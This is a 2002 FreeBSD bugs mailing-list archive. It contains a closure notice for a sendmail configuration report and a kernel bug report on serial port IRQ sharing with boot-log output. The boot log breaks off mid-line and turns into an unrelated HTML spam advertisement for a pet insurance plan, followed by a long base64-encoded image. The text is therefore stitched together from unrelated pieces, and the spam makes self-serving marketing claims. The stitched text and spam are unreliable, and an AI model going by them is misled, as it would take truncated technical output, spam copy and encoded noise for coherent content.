owner-freebsd-bugs Thu Aug 1 1:51:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 157F537B405; Thu, 1 Aug 2002 01:51:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B1B6243E5E; Thu, 1 Aug 2002 01:51:08 -0700 (PDT) (envelope-from maxim@FreeBSD.org) Received: from freefall.freebsd.org (maxim@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g718p8JU058220; Thu, 1 Aug 2002 01:51:08 -0700 (PDT) (envelope-from maxim@freefall.freebsd.org) Received: (from maxim@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g718p8ox058212; Thu, 1 Aug 2002 01:51:08 -0700 (PDT) Date: Thu, 1 Aug 2002 01:51:08 -0700 (PDT) From: Maxim Konovalov Message-Id: <200208010851.g718p8ox058212@freefall.freebsd.org> To: jamesv@postmaster.co.uk, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sendmail starts regardless of weather it is disables in the rc.conf State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Thu Aug 1 01:50:47 PDT 2002 State-Changed-Why: Configuration error. http://www.freebsd.org/cgi/query-pr.cgi?pr=41194 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Aug 1 2:50:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0896937B400 for ; Thu, 1 Aug 2002 02:50:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id CEAFB43E6A for ; Thu, 1 Aug 2002 02:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g719o2JU068684 for ; Thu, 1 Aug 2002 02:50:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g719o27F068683; Thu, 1 Aug 2002 02:50:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1D95F37B400 for ; Thu, 1 Aug 2002 02:41:01 -0700 (PDT) Received: from tomts13-srv.bellnexxia.net (tomts13.bellnexxia.net [209.226.175.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 304A943E42 for ; Thu, 1 Aug 2002 02:41:00 -0700 (PDT) (envelope-from matt@gsicomp.on.ca) Received: from xena.gsicomp.on.ca ([65.95.181.144]) by tomts10-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020716034537.HOJT18503.tomts10-srv.bellnexxia.net@xena.gsicomp.on.ca>; Mon, 15 Jul 2002 23:45:37 -0400 Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.3/8.11.3) with SMTP id g6G2VtX95371; Mon, 15 Jul 2002 22:31:55 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-Id: <001b01c22c7b$4397da20$1200a8c0@gsicomp.on.ca> Date: Mon, 15 Jul 2002 23:45:43 -0400 From: "Matthew Emmerton" To: Cc: Subject: kern/41227: Serial port IRQs cannot be shared when they should be Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41227 >Category: kern >Synopsis: Serial port IRQs cannot be shared when they should be >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Aug 01 02:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Matt Emmerton >Release: FreeBSD 4.6-STABLE i386 >Organization: GSI Computer Services >Environment: >Description: Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.6-STABLE #0: Sat Jul 13 23:22:54 EDT 2002 yid@:/usr/obj/usr/src/sys/PLANB Timecounter "i8254" frequency 1193182 Hz CPU: Pentium 4 (1693.73-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0xf0a Stepping = 10 Features=0x3febfbff,ACC> real memory = 536854528 (524272K bytes) avail memory = 518610944 (506456K bytes) Preloaded elf kernel "kernel" at 0xc03af000. md0: Malloc disk Using $PIR table, 8 entries at 0xc00f15d0 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 pcib1: at device 1.0 on pci0 pci1: on pcib1 pci1: at 0.0 irq 11 pcib2: at device 30.0 on pci0 pci2: on pcib2 sio0: <3COM PCI FaxModem> port 0xd800-0xd807 irq 9 at device 10.0 on pci2 sio0: moving to sio4 sio4: type 16550A pci2: (vendor=0x104c, dev=0x8020) at 11.0 irq 9 isab0: at device 31.0 on pci0 isa0: on isab0 atapci0: port 0xb800-0xb80f at device 31.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 uhci0: port 0xb400-0xb41f irq 5 at device 31.2 on pci0 usb0: on uhci0 usb0: USB revision 1.0 uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered ums0: HP HP USB WHEEL MOUSE, rev 1.00/0.00, addr 2, iclass 3/1 ums0: 3 buttons and Z dir. uhub1: HP Multimedia Keyboard Hub, class 9/0, rev 1.10/0.03, addr 3 uhub1: 3 ports with 2 removable, bus powered ukbd0: HP Multimedia Keyboard Hub, rev 1.10/0.03, addr 4, iclass 3/1 kbd0 at ukbd0 uhid0: HP Multimedia Keyboard Hub, rev 1.10/0.03, addr 4, iclass 3/0 uhci1: port 0xb000-0xb01f irq 9 at device 31.4 on pci0 uhci1: Could not allocate irq device_probe_and_attach: uhci1 attach returned 6 pcm0: port 0xa400-0xa43f,0xa800-0xa8ff irq 12 at device 31.5 on pci0 orm0: Email

 
This offer = is brought to=20 you by the American Pet Plan.com.  If you no longer wish to = receive=20 offers in the future, please unsubscribe below.  If you = cannot view=20 this email, please click here: www.americanpetplan.com=20

1992   Celebrating 10 years of = Excellence!  =20 2002
 

The American = Pet Plan can=20 save you hundreds or even thousands of dollars per = year on all=20 your veterinary health care costs!
All at very affordable rates!! =20

Veterinarian=20 Recommended!

Benefits=20 Include:
=20

$5.00 Doctor = Visits!
$10.00 Comprehensive Medical = Exams!
Lowest Cost In-Office=20 Vaccinations!
Benefits on All other Veterinary Care &=20 Rx's!
Benefits on Grooming &=20 Boarding!
Benefits on Pet Sitting & Dog = Training!
Immediate Benefits on Pre-existing=20 Conditions!
All Animals Accepted!
No Age Limits!
Extremely Affordable!
And So Much=20 More!

VISIT US = NOW=20 AT WWW.AMERICANPETPLAN.COM=20 !


This message is never sent = unsolicited. =20 You are receiving this message as a member of the American Pet = Plan.com or=20 one of our advertising affiliates.  If you do not want to = receive=20 special offers in the future, please click here: app= -request@americanpetplan.com=20 and type in UNSUBSCRIBE in the subject line.  You will be = immediately=20 = removed.

------=_NextPart_001_0002_01C23A2E.0244DFD0-- ------=_NextPart_000_0001_01C23A2E.0244DFD0 Content-Type: image/jpeg; name="index_header.jpg" Content-Transfer-Encoding: base64 Content-Location: http://www.americanpetplan.com/images/index_header.jpg /9j/4AAQSkZJRgABAQEASwBLAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEB AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wgARCABgAgkDASIA AhEBAxEB/8QAHgAAAgICAwEBAAAAAAAAAAAAAAgGBwUJAgMEAQr/xAAbAQEAAgMBAQAAAAAAAAAA AAAABAUBAwYCB//aAAwDAQACEAMQAAAB3+B1HaeT15AGAAAAEbyW3GSA1ZAAAAjsJlebYMdkY3oA wArbdiySvs56xJTAZ/TkA85AAAAAAAAAAAAAAAADiqGIqql3x2RRmluD7d8mw0MbJO555zPsRlt7 RfQAAAAEEfvWL1sfyvn+bDbF02m8JLqq8Vh53dwvVFUkL1vvpJdNf0bOyVmNdFCWnja4xGpOdc3u dTN6EW06HS9Dhfnm24c5uuTR7ux0I3mr3byFH1lSsb9dZ9pI9pz+ivQhuq0f1vu34WzVc3eqWNJr HW7Y/R8vKmK7TbN4tt6D95XL7qln+jRoen0uJd2nHp8Z2CSDVLE7vVu2vn86X6CeIkyQ6e7kJAAA AYbM0axc3T+dGGR27xC55jeW6TFxyumh4fvlWshdbu+jcJsXbdBHv6PmcuAAAAFYwes8LC+lLH57 mgtviJU+0UDyitINj1ZS6uchYUTMIwM0zWSb2fYElm+V4kbCVSV8yMVx1f7Y5f8AMWnh6EhvS2de YoqDCe2V5ZBQZlPonq1VKtKE6s1ss2y2jr/TG4lbX2L6oi0O+b5UK3cZjWrNZXDkMMUB2WlId+Fc 2TqfmK33tLlOv6Q1Xt4RHweAR8HgWmtaszhQbOrnKxlktikHs43pLSXqRQypvZNK6O6Ow5nZU8Wm ltOgpXuEfB4BeWDtOE5gb6tAYDstp+D1CF8Wk68+Vb62oBWfrSgrQ0oK7zZ8Fb4NOCtdDWArXxpg V30syCt+tmQV/paYFe7WcBYutoQWbwNR8FX5X7KfG9V+2e+6Pc1lyZHJSqJXOTRRjzsoMvrC+JdN c2Qym2Cs/bOeUa6ghYln7a9bBlDbBWvgy8d87lYXV5Oeiz19GzHlJptZf3ZnCfElAuTfXXrmJjet 95zdVrmMpW/iXJmoXmXzeYY304nKbInzHZQI4SMI4SMI4SMI4SMI4SMI4SMI4SMI4SMI4SMI4SMI 4SMI4SMI4SMIqi7h863tU6cKrYv4kJjiNii+0n073Y2I2/N5hdJDNZHE6Soogwfg9xcC+yMMHb/O 0HvK4pBWdulnbY8AjXcjiN6G6udVAmlqe14DE49vlA1zMPDGY8Ua8u3XVsHoORTV1h3v176LTvx9 o2Rps+v0xGaTeXY/ujMmuvmsn7OPIAAAAAAAAAAAAAAAAAAAAAAADGZPiVbgLq4kGht4dIuWUvf6 UD4WJ+FAYxlfgsMhvzmYKsb085Vkav3qFz62M+izXHNvQQOIXXxKkxN48CnZ9J+4rDDXF9KJLx+l A5W5eZXVidvoPoB//8QALRAAAAYCAgICAgEDBQEAAAAAAgMEBQYHAAEIExUYERIXIBYUMEAQISMo MlD/2gAIAQEAAQUC/wDqb3oOgyj+RujzNIsyvkolr3FG+FWUW/CAYEX9oYwFgIPJVEfu7PDUwoEa xI4pf2cXdpZyv55BsSq0q0n9FUyiCI9FLYq5HuTy0MxTc6tbwn/x7esD+GIK0laaUsjhEog5qJcM wbU3mLjBR6aDVJkS8KgP9jkZK1zDX/FWffyevZRMY/DGo/kFUZDQtuysEEeiMzjU7aHy0oXH3IEx jh0ZRXvU7i02TLqbsKta5HDm6vNXnWmjHySMcaRIrbgyySzOzYVXonDkDUbYYScSpJmxZZ0N4et7 c5n1G4rYnyMfLFi0dckFjQ50i9d8h0Mpsz7azmsAvSi9o9HR0QhkT3JuJXEhQAmqHK7a+akp8rYE 8bK5A1Ce2Q2dRafteSCz4bGnGMSqPTJpPuevCNqpIypWAjkBUSptQXZWLlHoPZkKsYn+wuXpW0j+ oI6tLEggW+whlEJgssbYo3lSdiUISDE72Q5Pe21W1uAyDIi7CPwoX2D+6aTOj3PII6uFLXVejltR UlXpkWuK9BAbwUVxIdTG2JcaXKROrlV1fyCra+4pQ+OSlbyKjsch1JyJ/WtfEqEweNW1RF+xWFfx 68nt3d7d5kKQHRi6Ezel461C5A/FkrVlmxHi2yjetxKHxKAqazkkgX3vS0BksDk3Ds/REqNc9a3z JO7sMq2OySKWuqTpqpo1Onc6LcnAlHTFMrP+sfF1Mg/ifDJbpPsbgHRPFR4Lkk2kcJRUdSdQBTa4 tccHxafS3D8lBsrh0Wj1K+LqkCK3S3AozYRaF+9jgBuHJXN2kGNEiUlOEJfxLgSuIkqzG6vTSHqR xpAegWlsUccgg3s+Elj1tNrf0/aXpJMvYq5jrzDYjeNNvVoPj9E5e819Faxk7JU0Xr6TQqI0zBHu utbpuWw+YpUL6Bgpar5BWCm4oq92A1Ia1UCqyu67s+Fn27Ub5YB0/pKbyt2t2FP9hIpNWUomUCiq Z2i0YP8AOvbJU1LSupFJhYhr5Xx9ko5iwNkgZxV7Uktgcp2absVpU1K7eOStz20ReXRN1mLAx0jI merW+mJcnhkKhkqi9aV1Wknr9lqqAPlbrKVrySwN6daAlLFOCWVxWsrNWU6jkLaIMCE19VsAktbB qmrpLWjhAq2kMAlrM5HmGoTNiB+1sEDVRGCGMkadFFUs6ZSzMKpndTC0x5DsjWEBfGx2RMMdbUID HjZZbpCDQiwn/wAfspvyvUik3kDXY9HXdAjdrbagh20txwYklTZ8KONT2tBytH2rCDMItKElCJui CACdbkEMNNuOvxpyrShABguCDgEZdUDGUptCGHDR21ByAKrUhB22a4IKgEqvqvDiQ23BdKS71roJ ThbcEUmp7hghYRXDA/lBetfJgut4wBaBtt6BJTFF7V2YSdakIGeK2ITvX5ZhP0/JsK7E9vwUnQrq g+w/lyD/AHLuiCa0pt6CG5q0YRoQbcgugqrOhJwm+1oOlElvqvSQ+wlc57CVznsJXOewlc57CVzn sJXOSy54C/IFcsialWCfxNIrV2hFzjxWtGD1BtpMAjV88jysBEwYO1dMGM1VFrSjDTsnkDXgA+wl c57CVzkPs+KTlZ86/wBXHjfWTisUcbqrJz16q753x6q7PXqsM9eqxz16rDPXqsM3x6rDNceqwz16 q/PXqrs1x6q/N8eqxz16rD49eqzzXHqsM3x6rDA8eqvzfHqq89eqv+dceqswXHqrs1x6rDPXqr8D x6q3BceqtwPHqr83x6qzN8eqxz16rHPXqsc9eqyz16rDPXusM3x6rDA8eqwzfHqr89eqvz16q/PX qsc1x6rDNceqrz16qrPXqqs9eqqz16qrPXqqs9eqqzfHuqvhfQlblBW05GizPxExZ+ImLPxExZ+I mLPxExZqoWL5ZaRhSrZfHyrN69eqqz16qrINX0OrxUQ4aMEAX21hvz8OgDt4IpX89SvOpXnSrzpV 50q86ledSvOpXnUrzqV50q86ledKvOpXnSrzqV51K86VedSvOpXnSrzqV51K86ledSvOpXnUqxpd CHwrqV5qcM4n2RzBqie0hihYR1K86lePDkWwtzM5afmx9kaCNtqI05ej6leSKZNMVOBMWfbubKm8 qRdavOpXnUrzqV46rvDoW+Wtr+kaj0r/AJ4U3PCG54Q7H41FGkQpZGC0pbVs0BDceVgQn7F1K8dZ M3Mzt1K8bQKOxP8AP0zevnBpgDzx5OePJzx5OePJzx5OePJzx5OePJzx5OePJzx5OePJzx5OePJz x5OePJzx5OePJzx5OePJzx5OePJzx5OePJzx5OePJwxGlJLnbyB5jPHhGVut3I5uakFItj+/vD1/ U2FdkjsHQZg3SSRR1BJJ5MWuB28N0UNNnEKtv9lkgc5LFpLKXm2Qkp97dwH2FezlWbtIpxW61E6P qux5AZA5RL5JFKmmMosRmQBSE/XkS9FtEQjESl8WaZlMRt0mDJXZLcDW/wA5l81YWtclZuQKo11c pfV8jlbcRNExb+ufJtHq002zaC1NAHgiZaTwoh0swSQjWEJytbDr4/zn+NifzZawAlDFFIykgLHK mrctbInGSYbF49AUMPdj4XoEufomilUXWVm3LlK2Ft6qZqoejHNGyPIWyWw2JIoaoLWqFGQGtm6C rJaDyzc2wFGhhyqrEC2PucQbH1xeogheZnp3/wB3WtEExkLqeMoj+LEK5gxxVqju4NFmmBNpi8Ys S1qjOmrqq2EpDBDGuQyeFpJa1Cb1pLjGYu1xlrg7HqGtOlWzMS/bNf55wd70pSGDwtsHoZqUXSFs HvallHswDYaEHjTsE1n/ADpqN3oxkMzTKdiJoMLGWRvRa5sGaeFr/wCETQL5G0nfPiTvjTOf9mtM MkDklEcFE1CLEqQmb3puNwpuM+U6b6AWoxG4mZ9axU1j++2wzZZTWZrfjzMSIxB2UXoOv8/4+c69 Z1Bz6azqDmyQ7zpDnQHP6cGdIc6A50AzRIdZ9c2UHefTWdQc2QHOgGdAMCDQc2DW80WHWbLDvOkO aLDnxrNl63mi9azZQd51BzpDnUHNF61+n//EAEkRAAEDAgQDAwkDCAYLAQAAAAECAwQFEQYHEiEA EzEUIkEVFhcjMlZhlNIlUXEgM0NXkZWx0xA0UoGh8CcwNUBCUFNydbPB4f/aAAgBAwEBPwH8m4va 4v1t42++35BUkdVJH4kD+kkDqQPxNuNSbX1C333Fv2/62K4xzeWVevJGhJb1C3UkHpqvYfhfiJRl SXTdppbTamtuW56xK2wXdYIKdaDfvbWTYdeK5S/J72psWZUbW/sqIvYfA7/h+TI3b5YJBdui4BJS m3fVZNz07oPgpSeGn1dkcV+lYQsKCgfabSeo7psbfA8CQ+VBPqu9H5w7qu6QTse/vcD4aSeqtPeE lahGAACn21LJsSBoCdgLj2iodTsAeu3Bef5jDelCVOtOKUFXOlaNPiFezdV7dSBa+9+C8ppx8rQ2 VNR0LJQCCpX9nUSe5q6bXA+/jmPJbU4eVbS2pJvoHetr1XJ6blO41bJvffgyl8qQtOklpxKU3SsA hRSO8kkKBGr4fhwy8tTrra9PdShaSkEbLANjcm9vv2/Dh7+uxtr+qf8A4o4RripZZ2KnXVm9lFKE +0UpGxNrgJ9kdT4WKlvF2KlVmypLqlItcakaACe9cpsu4TcWPUmwtO/qyv8AvY/97fDjSgJT2yUq iFAQOpKUKJUrwvvYddh13twX1Mx0FOjaNrF7qUVJHTQkghH9pfQX3t4qfd5jSEaBzGFuXUlRsU2+ 5QuN+n+PEd0vMNuqABWkKIHThEhxTXaClPK5bjmkX1p07oHUgkpvq2Fjbw4Q+u6EqCbrYLosDZKh 4ddxb8D+3ZqS+vs9+UO0NOK9lR0qRo3/ADm4Ou+nY7e1vtGdU8yhxVtR626bfiT/AB/IOwvwAohK rd1ZsCDffbb9h4gUJLhTIEhHOUEgJI02IUNSSSo7j4dbcQJjsflh5LJc9YEt+w36ropTvsp1JAO5 UdRO3GJH3n39aygJK1XbaKlNoVYWSFFKQuwvuOlz+SjJXNdzQ+3l3i9aXG0lC00WcUKbXZaVJ9Va ygQdQ6i3gOPQdmv63/RxjH1wIc+xJ3euAn/pbbbXG/Xj0G5r3B9HGMLhHLH2JO9j7vzXx/H9nHoN zX0oT6N8YAN+wRRZ4Unp0Vy7/wCfhx6D82NSF+jjGOpAKUk0Wedle1e7e9/Enc8eg/NcqUs5b4vJ WnQu9EnWUn7iOVb/ACePQZmuU6DlxjEpukgGjVA2KSCnTdvu2O+39/HoMzWIWPRxjEhwhS70aobl JBH6P4D+HTbhOSGbCVFYy4xhqUACfIk7cAAD9F4W/jwckM2CtLhy4xhrSCEnyJO2BtfblW38f/zh eSGbLltWXGMNjdJFEnAg/eCGtuDkfmwdB9HOMbovpV5Fn6u9bV3uXfew8fDa1uHMkc2XU6V5cYwK bg28iThukhQ/ReBAPBySzaUgoVlzjApUnSfsSdukixF+V4jg5F5qnrlvjD83yv8AYs8er37uzY27 x/yNvQdmvdJ9HGMbpQUJPkWfsk9R+b8f/nw4TkbmsnlWy3xh6kKDf2JP7oVa/wCj/jwnI7NdF9OX GMADfu+RZ+jfr3eXp/w6bcDI7NcG4y4xhfRyx9iTtkbmw9Vt169fjtwnI3NdPLtlxjAcoFLf2JO7 oVa4/NeNh1vw3khmy0kIRlxjAJHQeRJx/i3fj0K5t/q5xh+4538rj0K5t/q5xh+4538rj0K5t/q5 xh+4538rhWSubljbLnGF/wDwc7+Vwzk3nCzpKMtsW3CupoM09fEpLJHEPKjNkpKn8vcXMKCkqGig zvaH/Fp5PifDhzLHMpxpsOZeYuK0klRbotTSFpWLOJKQwAkq6Gx+PFVyhzVkkcrLvF57wNhQ5+kC 3gSyD1Jve/HoVzb/AFc4w/cc7+Vx6Fc2/wBXOMP3HO/lcVii1bD1QfpVcp0ulVKNp7RBnMqYks60 haA40sBSCUkKsQDY/wBCsbYuWSpWJKypR6qVPkKUfxJWSf7+PPTFnvFV/nn/AKuPPTFnvFV/nn/q 489MWe8VX+ef+rjz0xZ7xVf55/6uPPTFnvFV/nn/AKuPPTFnvFV/nn/q489MWe8VX+ef+rjz0xZ7 xVf55/6uPPTFnvFV/nn/AKuPPTFnvFV/nn/q489MWe8VX+ef+rjz0xZ7xVf55/6uPPTFnvFV/nn/ AKuPPPFvvFV/nn/q4k4qxrDfcjS63XY0hohLrD8mU080ogK0uNLKVoVYg6VAEX3HCZGaapkCnJVi 9U+qRRPpkJKaiqXUYRbU6mZBjhPNlxVNNuOpfYQtpTbbiwopQohzGGMGlrbcxBWUONqKFoVNfCkq SbFJGrYg7EeB4jYrxrMkMRIlbrsmVJdbYjRmJUl19991QQ0yy0gqW444tQQhCAVKUQACeG63mE9U vIzNRxI9Vu2Kp/k5p2Y7M7cha21ROzo1OdoSttxJa06gUL27ps5i/GDLjjLuIKyh1pam3EKmvhSF oUUrSoa+qVAg/HhuVmk7CZqLK8YPQJEaTMYmtN1J2M9EhKCJspp5CFNuR4ayES3kqLcZZ0vKQduJ mIceU4RFT6riGGKhEbqELtL8pntUF5TiGZjAcKS5GdU04Gnk3bc0K0KNjx56Ys94qv8APP8A1cMY sxnKfajRq7W35D7iGWGWpchbrzrigltptCVFS3FqIShCQVKUQlIJPEypZlU8TFT5WKoYp60Nz+0m cz2JbjgaQiWHAkx1rdUltKXdBKyEgXPHnpiz3iq/zz/1cQ8T43qMpiDArNemTJTqWY0WNJlPSJDy zZDTLLZUt11Z7qG0JKlKsEgk8VGr5j0dLaqrMxTTUPOSGWVzu3xUOvRHOVKaaW8EJcdiu+rkNpJW w53HQlW3Axli43tiGsHSLm01/YXAue9sLkC/3kDx4g4jx3U3zGp1WxDOkBmRILER+W+6GIrK5El4 obKlcthhtbrq7WQhJUTbibOmVKQqXPkvTJKwkLfkOKddUEJCEArUSTpSAkfcBb/cMLTaDRalRZ85 xUl4z4z0l1sOITQ47ExpTjqW3YEkTpzrKXC2WE6IiSlTDomqbfg4pqVFxLmNWasuatnD9XxI/MXN 7O/z26VIl8xa0xuWXu0ojEhLWnSXgE6+X6ziTmbh1WI8fYojJYjzxQHsM5dhqPVA7GhuMIpTMtRU oxIK4tKS4ptrkJKpUl1KlabvOIqmW8djDVMajxHKXPh4ej4vmv0yS/iOFITPbnYjkQX3IqG4vODa IEV6nTppRTkLaagtSJMqTIi4vy6p9QoVTgs01iXRnMYYgSYuHlsBdb1OR8EUfniKmUaZTWURZwec W8p+WHHp5bkbqp2YGHKMzh96O92uVh3CNVnx7UwsSZ2ZGIS6xImVCaGG3HWqTEmKS1JLi+b5NiuI eW84kx8e1DDtTrsVOGUQ2KRCo1Hpgls0zyX2+VGip7fU5sZphK1SpExx5TrvJU4ptLSPW6AtVezJ jxapRqbg6W3EoVJwrBwgxXV0+QamzCmIQrEs1iHJVyI8ydJckKcfZjmWppCAxKa1lKTirLCo4hkT 6qrmQmMR4fpNMZlUd+dHi5c4bpquTGhx3GFhmZV5sSFGqRdZTJZjSZfZSEvPldFxfl3FNPcnUWiP v9pxliOqB7DUd6GuozEPx8L4WjNdjUW6NHTypjnqyxHcXymQ0tHOGW9Rw/RsY0qu4kdKafRXV1Ru OiO88uXUYra3KWwAy24GkJniO884saUtNKSkKUQOKdiik1Svz6zi6HDW4abX5kdLEV7sdVxTMcfm wJFeQ2XJMmJ2x1suNAFlQixWnWQyuUpbmK8DxIdTegUOnS6vHw3h7D9LM+hQlw6jVG5zk3EOKZEN TJjRV6Et02ns258iGtKpiQrmtJy6xFRqFiyTi2tFhqRTYVXqNDgMQV9jfxG+w6imMliIzyYVPjvP qeBQEiOWWEtNFI7tFxnTKrTJ1Lxc5GaYpcKbJwnBMWUulnEFWmtrq1Vqrzcasz5dRXEL5hOVBmfC afULstIQgcN44wyilxeXAw2iRNxXJr+IaKrDio1LkUylIhM0DDra48aU6mDL5Mmc+S7ICZr2qWhx CnkvVOtUOJKxdMwpUnYTEuOnD9GhOUpEaZJoU91D1Tedmw0sR0utoZVTFLlM9tqFPllTxS+HAP8A kf8A/8QAQREAAgIBAgQCBwQGBwkAAAAAAQIDBAUREgAGEyEUFQciMTJUk9EWI0FhICRRVZTSEBcz QlKBkSUmMDRAUGJydP/aAAgBAgEBPwH29h3J9g4IKkqwIIJBBGhBHYgg+wj8R+gYZhCtgxSiu8jQ rOY26LSoqu8SyabDIiujMgO5VdSRow/Qho3bCdSCnanT/HDXlkT9nvIhHtB/HhlZSVYFWUkMrAgg j2gg9wR+IP8ARDXsWW214Jp2HtWGJ5WH+SBjw1O2kqwPVsJO/uQtBIsr/wDrGV3t7D7B+HDKyMUd WR1OjKwKspHtBB7gj9h/4maNpaxdEYVgPXlWTaS2umwqO+wLqSe2rFR+HeDKxLNWSKW0JH/5ndIn qMG79IqysqDt6ra6njDZB7StDMwaaMahgdSydve/Yw1H5n/L9HkxI4cumZnignhwLQ5FK1qxWqw3 r6TxjH0mmuPHW0M2tyeGRvv6NK4iAtpxm+VaR9IeHxwaU4LmvK4mSrZqSwiTwWatQRyNBMUs1+rF 4jqf2csSllTvpxNyZynFUmtr5/IlDnJOWrCm9QVrkU8UDLJCwxZ8I1eScgyOlnxaQbuhTa1tpWeR cZj5+ebNixamx3KuWxuKrV1s1a1qy2TlsMJrFqWvJEEp1asm9Y6oexPLEU6Ucco4g5X5V8n5pzT3 8pfpYHmHD0Kc9B68Av4vIm27O0Nqkzx3DHVESSF0iill6r1pVi6MlXlennsLyjXx2SzNajnOd8rj oq+Qs17VWhTRYG8ZFUhrV9cj4MgTgWelaljCosAfURYXlm5mqOJrNzDHMbmaqX6qQR5K0xp+IbE+ E8PWhOtvpxw3nNeUUx1raxPFGIWq8g4mTmDkrG2pMglXmPEWrl9K1/HTyw2qda5I/gr0NW1TetNJ WUp93OQjt96Tpt5i5dxWP5dwOaxxvrJkLmXoW4rliCwrPjbLQJPB0alUwLKELNC5sFNVUTNtLvy6 xHos51/WGrD7R8r/AHi9TUfd5HXaI++p0H+EHaNWGg4yQxfPt7mbmcJZgx/LmDxMQieatUyGYuDb RitXJ2FqKuJEgmtWtotSapHXRwJOtDSxPK9fl70hXaqS5iKhZ5cqY/IGdYbCUMs1+zNFF1KTxQXU mxccM9zw0hmrmSGGOsks3V9ErMvO9IqxUjE80kEEjQrytmGU6jv6rAMNO4IBHccYTmOpPa5C5bQ2 Lt6l6Q62TmyNgaRwR28rjoYqNEu7WGiUVjYkeRYAZbMiCJhGkrQcqUOaOcsnHckyO61ztBirLxGG pUrVchOUNjzK3HNBPkpJC3hMYqixOIZHRZwWEeP5SwPlPMGSyT5aV8LzVj8JHFTtVKy2qluSaNt/ Wx9ow2B0t4nDPEo1Xwrkg8c44OHl3mrN4GpJLNBjshJVgknZDKyeqU6jIkaFgG0LBEB012r7OMty bhqXMP2Mhu3lz/neCw0NycQtirZvt4XJWgixRzVoa1ySI1A00xlrB+o3U023+T8SkGQuUZb/AIbF 83QcuzLZmrmW3TmWMLajZKqLXs9TqkoY54kR4h6zRM02e5I5UxC86GFs9Z+x+fwtFy9+jH4+nlEv yPXH+yP1a1CKJj8bsni6ku9aLpDpPz1gKnLPM+RxFGSeSnAYmrm06SWBHLEr7ZZI4oUdgSe6xJ20 GhI3H9BrMSl13aPGNSGBUFfZvUnsUHfU8ZHPVpgac0brXO4mQFXBI90j1W01PYdvaRxaix8Djw1i di7K7WNqskSyaBozCgDM6tqToAAPz45ehgir6xpJq6KwlnUJLKv959m5iik6aAn2afonnLELQbFn LYpa/i/FsOpAJjZVOiC8wIldY4y6RxOzRRdSZo0R5pWdPShDH5DtzuJ/3alhmwzM1Z2pyQWmuxHe xLSqLL9Qxyl4zoqldiKoPpRjMUkBz+KMU2VjzcqE1dHykfR22m/PSCMGP+xI36x+u+q+lNRdyV5+ YMVNLmdhysVjwU9S+8YIjexUlVq7um99D0x78gPZ3B/rGqeAyOL88xAo5a1Bcu14/BQxvPVBWqY1 hWNa6VQzCCGARwxqzKI9vbiP0kQQ0MdjoeYsfDWxN5sljunNXSWrfZlZrKTLpIZDtUeuzLtVQF0R dE9K4iyC5SHO4SC6ILNeSavBjIGtR3K71bPjDFErWmlryPGWmZiiu4j2B31T0r9OxirUfMGGjnws FmrjXjixsXhoLUUsMsapHEse3pzyhfU9Vn6o++AkF30h0chj62LsZvFGlTnsWa0SSQJ0prcsk1lw wO49WSViwYkABFUKqACv6QaNXE28HFm8WMbfnitW65krnrzwKVryNIT1QYA7dII6qu9zoSza4rn6 jhZJ3oZ3GqtqHw9uCaStYrWoNyv0rFebfFKodQw3L27j3WcGL0kVYVyUUeawor5bwvjKYixyUnai JBSdKaRpWjNbrS9MLEEJlkMqyF31xHPmPwVwZDG5zGwXFhswJMZoJCkVyvLUsqqyFk++rTywsSpY 